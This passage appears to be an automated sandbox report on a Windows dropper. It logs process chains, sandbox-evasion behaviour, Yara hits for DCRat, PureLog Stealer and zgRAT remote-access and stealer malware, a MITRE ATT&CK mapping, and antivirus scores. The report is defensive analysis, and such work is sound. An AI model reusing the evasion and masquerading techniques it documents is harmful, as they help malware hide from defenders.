Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost			Jump to behavior

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Memory allocated: 1380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Memory allocated: 1B090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Memory allocated: 3190000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Memory allocated: 1B3C0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Memory allocated: E60000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Memory allocated: 1A9F0000 memory reserve \| memory write watch
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Memory allocated: 1B040000 memory reserve \| memory write watch
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Memory allocated: 1340000 memory reserve \| memory write watch
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Memory allocated: 1AD80000 memory reserve \| memory write watch
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Memory allocated: 1070000 memory reserve \| memory write watch
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Memory allocated: 1AAF0000 memory reserve \| memory write watch
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Memory allocated: 1060000 memory reserve \| memory write watch
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Memory allocated: 1AD00000 memory reserve \| memory write watch

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wNZUMzpS.log	Jump to dropped file
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iJCvyQAH.log	Jump to dropped file

Source: C:\Users\user\Desktop\yX8787W7de.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23501

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe TID: 2260	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe TID: 7564	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe TID: 7220	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe TID: 7236	Thread sleep time: -922337203685477s >= -30000s
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe TID: 7276	Thread sleep time: -922337203685477s >= -30000s
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe TID: 7336	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe TID: 7300	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe TID: 7328	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0012A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_0012A69B
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0013C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_0013C220

Source: C:\Users\user\Desktop\yX8787W7de.exe

Code function: 0_2_0013E6A3 VirtualQuery,GetSystemInfo,

0_2_0013E6A3

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Thread delayed: delay time: 922337203685477

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: MsintoRefcommonsvc.exe, 00000005.00000002.1892406143.000000001C14A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: yX8787W7de.exe, SystemSettings.exe.5.dr, WmiPrvSE.exe.5.dr, SwjJGfgwqbpLdPqvPFcqLsY.exe0.5.dr, conhost.exe.5.dr, SwjJGfgwqbpLdPqvPFcqLsY.exe.5.dr, MsintoRefcommonsvc.exe.0.dr	Binary or memory string: urUHhGFSlChjFdqZFYX2
Source: conhost.exe, 0000001F.00000002.1998443695.000000001BE07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: MsintoRefcommonsvc.exe, 00000005.00000002.1892478620.000000001C164000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: yX8787W7de.exe, 00000000.00000003.1643587874.00000000027D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000001.00000002.1848830925.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\$d5G
Source: conhost.exe, 0000001F.00000002.1998443695.000000001BD50000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002E.00000002.2035065695.000002D1A88E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\yX8787W7de.exe

API call chain: ExitProcess graph end node

graph_0-23651

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\yX8787W7de.exe

Code function: 0_2_0013F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0013F838

Source: C:\Users\user\Desktop\yX8787W7de.exe

Code function: 0_2_00147DEE mov eax, dword ptr fs:[00000030h]

0_2_00147DEE

Source: C:\Users\user\Desktop\yX8787W7de.exe

Code function: 0_2_0014C030 GetProcessHeap,

0_2_0014C030

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process token adjusted: Debug
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process token adjusted: Debug
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process token adjusted: Debug
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process token adjusted: Debug
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0013F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0013F838
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0013F9D5 SetUnhandledExceptionFilter,	0_2_0013F9D5
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_0013FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0013FBCA
Source: C:\Users\user\Desktop\yX8787W7de.exe	Code function: 0_2_00148EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00148EBD

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\yX8787W7de.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\fontrefcrt\JfSdr.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\fontrefcrt\YPm3Ri0zuGSw0d5cA9MOsCVgRsbtCEjXWkwqUVDQU6Ex.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\fontrefcrt\MsintoRefcommonsvc.exe "C:\fontrefcrt/MsintoRefcommonsvc.exe"	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline"	Jump to behavior
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FAE.tmp" "c:\Windows\System32\CSCE4B7E694399A43119EA8A93F1E7760F4.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\yX8787W7de.exe

Code function: 0_2_0013F654 cpuid

0_2_0013F654

Source: C:\Users\user\Desktop\yX8787W7de.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0013AF0F

Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Queries volume information: C:\fontrefcrt\MsintoRefcommonsvc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Queries volume information: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe VolumeInformation
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Queries volume information: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe VolumeInformation
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Queries volume information: C:\fontrefcrt\MsintoRefcommonsvc.exe VolumeInformation
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Queries volume information: C:\fontrefcrt\MsintoRefcommonsvc.exe VolumeInformation
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Queries volume information: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe VolumeInformation
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Queries volume information: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\yX8787W7de.exe

Code function: 0_2_0013DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0013DF1E

Source: C:\Users\user\Desktop\yX8787W7de.exe

Code function: 0_2_0012B146 GetVersionExW,

0_2_0012B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.1889075277.00000000130A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MsintoRefcommonsvc.exe PID: 5340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 7184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SwjJGfgwqbpLdPqvPFcqLsY.exe PID: 7260, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: yX8787W7de.exe, type: SAMPLE
Source: Yara match	File source: 5.0.MsintoRefcommonsvc.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.62616d2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.6b756d2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1640565455.0000000006B27000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1639922058.0000000006213000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1847919566.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1641053706.0000000006B25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\fontrefcrt\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\SystemSettings.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe, type: DROPPED
Source: Yara match	File source: C:\fontrefcrt\MsintoRefcommonsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: yX8787W7de.exe, type: SAMPLE
Source: Yara match	File source: 5.0.MsintoRefcommonsvc.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.62616d2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.6b756d2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\fontrefcrt\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\SystemSettings.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe, type: DROPPED
Source: Yara match	File source: C:\fontrefcrt\MsintoRefcommonsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.1889075277.00000000130A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MsintoRefcommonsvc.exe PID: 5340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 7184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SwjJGfgwqbpLdPqvPFcqLsY.exe PID: 7260, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: yX8787W7de.exe, type: SAMPLE
Source: Yara match	File source: 5.0.MsintoRefcommonsvc.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.62616d2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.6b756d2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1640565455.0000000006B27000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1639922058.0000000006213000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1847919566.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1641053706.0000000006B25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\fontrefcrt\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\SystemSettings.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe, type: DROPPED
Source: Yara match	File source: C:\fontrefcrt\MsintoRefcommonsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: yX8787W7de.exe, type: SAMPLE
Source: Yara match	File source: 5.0.MsintoRefcommonsvc.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.62616d2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.62616d2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.6b756d2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.yX8787W7de.exe.6b756d2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\fontrefcrt\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\SystemSettings.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe, type: DROPPED
Source: Yara match	File source: C:\fontrefcrt\MsintoRefcommonsvc.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	31 Registry Run Keys / Startup Folder	31 Registry Run Keys / Startup Folder	13 Software Packing	NTDS	121 Security Software Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	133 Masquerading	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
yX8787W7de.exe	79%	ReversingLabs	Win32.Trojan.Uztuby
yX8787W7de.exe	57%	Virustotal		Browse
yX8787W7de.exe	100%	Avira	VBS/Runner.VPG
yX8787W7de.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Recovery\SystemSettings.exe	100%	Avira	HEUR/AGEN.1323342
C:\fontrefcrt\WmiPrvSE.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	100%	Avira	HEUR/AGEN.1323342
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\wNNbKC3aho.bat	100%	Avira	BAT/Delbat.C
C:\fontrefcrt\JfSdr.vbe	100%	Avira	VBS/Runner.VPG
C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	100%	Avira	HEUR/AGEN.1323342
C:\fontrefcrt\MsintoRefcommonsvc.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat	100%	Avira	BAT/Delbat.C
